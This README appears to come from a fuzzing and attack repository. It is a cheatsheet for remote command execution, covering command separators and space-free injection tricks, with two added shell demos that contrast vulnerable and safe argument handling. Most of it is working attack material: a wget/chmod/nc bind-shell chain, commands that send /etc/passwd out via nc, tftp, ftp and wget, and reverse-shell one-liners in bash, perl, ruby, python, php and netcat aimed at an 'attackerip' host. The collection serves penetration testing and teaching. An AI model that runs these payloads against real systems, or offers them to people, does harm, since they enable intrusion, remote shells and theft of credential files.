attack/os-cmd-execution/README.md

Remote Command Exec Cheatsheet

Executing Commands

Various ways of separating commands (sh unless noted):

blah;blah2

blah && blah2   (run blah2 only if blah succeeds)

FAIL || X   (run X only if FAIL fails)

blah%0Dblah2%0Dblah3   (URL-encoded carriage return; %0A, a newline, is the separator sh itself honours)

`blah`   (command substitution; $(blah) is equivalent)

`blah & blah2`

blah ^ blah2   (cmd.exe only: ^ is the escape character rather than a separator, so it does not chain commands; it is useful for splitting filtered keywords, e.g. wh^oami)
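The list above is easiest to understand next to the code pattern it exploits. The following is an added example, not part of the fuzzdb page: a vulnerable function that splices user input into a string handed to sh -c, a hardened one that passes the same value as a single argv element, and one payload per separator (the Windows-only ^ case is omitted). The "echo lookup" command and the IN""JECTED canary are stand-ins chosen for this demo; the sample payloads are constructed here.

```shell
#!/bin/sh
# Added example (not from the fuzzdb page): each separator listed above turns a
# string-built command into two commands; passing the value as its own argv
# element defuses all of them. "echo lookup" stands in for a real tool.

# Vulnerable: attacker-controlled text is spliced into a string that a shell
# re-parses, so every separator in the list above is honoured.
vuln_lookup() {
    sh -c "echo lookup $1"
}

# Hardened: the value is one argv element and no shell ever re-parses it.
safe_lookup() {
    echo lookup "$1"
}

# The canary command is echo IN""JECTED: the empty quotes are removed only when
# a shell parses the payload, so the bare word INJECTED appears in the output
# only if injection actually happened (the safe path echoes the quotes back).
probe() {
    out=$("$1" "$2" 2>/dev/null) || true
    case $out in
        *INJECTED*) echo injected ;;
        *)          echo clean ;;
    esac
}

nl='
'
# One constructed payload per separator above. %0A/%0D arrive URL-decoded, so
# that case is a literal newline. "||" only fires after a failure, so the pipe
# into false supplies one. Returns 0 only if every payload injects through
# vuln_lookup and none injects through safe_lookup.
run_payloads() {
    set -- \
        'host;echo IN""JECTED' \
        'host&&echo IN""JECTED' \
        'host|false||echo IN""JECTED' \
        "host${nl}echo IN\"\"JECTED" \
        'host`echo IN""JECTED`' \
        'host$(echo IN""JECTED)'
    rc=0
    for p in "$@"; do
        v=$(probe vuln_lookup "$p")
        s=$(probe safe_lookup "$p")
        printf '%-34s vuln=%-9s safe=%s\n' \
            "$(printf '%s' "$p" | tr '\n' ' ')" "$v" "$s"
        [ "$v" = injected ] && [ "$s" = clean ] || rc=1
    done
    return $rc
}

run_payloads
```

Every row prints vuln=injected safe=clean: the fix is not filtering separators but never letting a shell re-parse the value (argv arrays, or no shell at all).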

Shell commands without spaces

Using the Internal Field Separator (IFS) and other space-free forms. All of these rely on bash features (${IFS:0:1}, brace expansion, $'...') and will not work under dash or another plain POSIX sh.

Test for cmd injection without spaces (${IFS:0:1} is the first IFS character, a space; a 20 second delay confirms execution):

sleep${IFS:0:1}20

Example netcat bind shell without spaces. This one uses brace expansion rather than IFS: bash expands {a,b,c} to a b c before running the command. The -e option needs a netcat built with it (traditional nc or ncat); the OpenBSD nc lacks it.

{wget,http://attackerip/nc}

{chmod,+x,./nc}

{./nc,-l,-p,1234,-e,/bin/bash}

$IFS shell variable:

cat$IFS/etc/passwd

Read the file one line at a time: the +1 after tail is the 1-based line number, so step it to +2, +3, ... to retrieve the entire file.

cat$IFS/etc/passwd|tail$IFS-n+1|head$IFS-n+1

Shell variables ($'...' is ANSI-C quoting; \x20 is a space):

CMD=$'cat\x20/etc/passwd';$CMD

The same line-by-line walk with the space held in a variable; again, step the +1 after tail to retrieve the whole file:

SP=$'\x20';cat$SP/etc/passwd|tail$SP-n+1|head$SP-n+1
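Added example, not from the fuzzdb page: a space-blacklisting filter of the kind these payloads are written to defeat, with each space-free form from this section run through it. It assumes bash is installed (the ${IFS:0:1}, {a,b} and $'...' forms are bash features) and uses a constructed three-line file in place of /etc/passwd so it runs anywhere; the filtered_exec, demo and line_n names are this example's own.

```shell
#!/bin/sh
# Added example (not from the fuzzdb page): a naive space filter and the
# space-free payloads from the section above passing straight through it.

# Naive "defence": refuse any command containing a space, then run the rest
# through bash. Every payload below passes the check and still executes.
filtered_exec() {
    case $1 in
        *' '*) echo rejected; return 1 ;;
    esac
    bash -c "$1"
}

# Constructed three-line stand-in for /etc/passwd so the example runs anywhere.
tmp=$(mktemp)
trap 'rm -f "$tmp"' EXIT
printf 'root:x:0:0\nbin:x:1:1\ndaemon:x:2:2\n' > "$tmp"

# The tail/head line walk from above: the number after tail's -n+ is the
# 1-based line to fetch, so a caller steps it 1, 2, 3, ... to read the file.
line_n() {
    filtered_exec "cat\${IFS}$tmp|tail\${IFS}-n+$1|head\${IFS}-n1"
}

# Each space-free form from the list above; every call prints one word.
demo() {
    filtered_exec 'echo${IFS}a'               # $IFS expands to whitespace
    filtered_exec 'echo${IFS:0:1}b'           # first IFS character (bash)
    filtered_exec '{echo,c}'                  # brace expansion, not IFS
    filtered_exec "CMD=\$'echo\x20d';\$CMD"   # ANSI-C quoting in a variable
    filtered_exec "{cat,$tmp}"                # brace expansion with a file arg
}

filtered_exec 'echo x'   # the filter only stops a literal space
demo
line_n 2
```

The filter rejects only the one command with a literal space; everything else runs, which is why blacklisting characters is not a defence against command injection.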

Exfiltrating Files / Data

FTP

Build an ftp command script with echo (user, password, put file) and feed it to the ftp client on stdin (ftp -n host < script on Unix; ftp -s:script on Windows).

NC

nc -e /bin/sh host port   (gives a shell rather than a file; needs a netcat built with -e)

nc host port < /etc/passwd   (sends the file itself; echo /etc/passwd | nc would only send the path string)

TFTP (the receiving tftp server must permit uploads):

echo put /etc/passwd | tftp host

WGET (a URL is required, or wget exits with an error):

wget --post-file=/etc/passwd http://attackerip/

One-Liner Reverse Shells

On the listener

$ nc -l -p 1234 -vvv   (with the OpenBSD netcat, drop -p)

On the remote host...

Bash (/dev/tcp is a bash feature, absent from POSIX sh):

$ bash -i >& /dev/tcp/attackerip/1234 0>&1

$ exec 5<>/dev/tcp/attackerip/1234

$ cat <&5 | while read line; do $line 2>&5 >&5; done

Perl

$ perl -e 'use Socket;$i="attackerip";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl for Windows target (cmd.exe does not treat single quotes as quoting, so on Windows wrap the script in double quotes and escape the inner ones):

$ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

$ ruby -rsocket -e'f=TCPSocket.open("attackerip",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Python

$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

$ php -r '$sock=fsockopen("attackerip",1234);exec("/bin/sh -i <&3 >&3 2>&3");' (Assumes the TCP socket is file descriptor 3. If it doesn't work, try 4, 5, or 6.)

Netcat (for a netcat without -e; the fifo carries the shell's input back from nc):

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip 1234 >/tmp/f


XTERM

To catch incoming xterm, start an open X Server on your system (:1 - which listens on TCP port 6001) with Xnest. Recent X servers default to -nolisten tcp, so add -listen tcp if needed and confirm that port 6001 is actually open before proceeding:

Xnest :1

Authorize the target IP's connection to you:

Run this OUTSIDE the Xnest:

xterm -display 127.0.0.1:1

Run this INSIDE the spawned xterm on the open X Server

xhost +targetip

Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:

xterm -display attackerip:1

or

DISPLAY=attackerip:1 xterm   (display :N maps to TCP port 6000+N, so :1 matches the Xnest on 6001)

It will try to connect back to you, attackerip, on TCP port 6001.

If the xterm path is not within the PATH environment variable, you need to specify its filepath. Solaris path example:

/usr/openwin/bin/xterm -display attackerip:1

More docs: /docs/attack-docs/remote-cmd-exfiltration/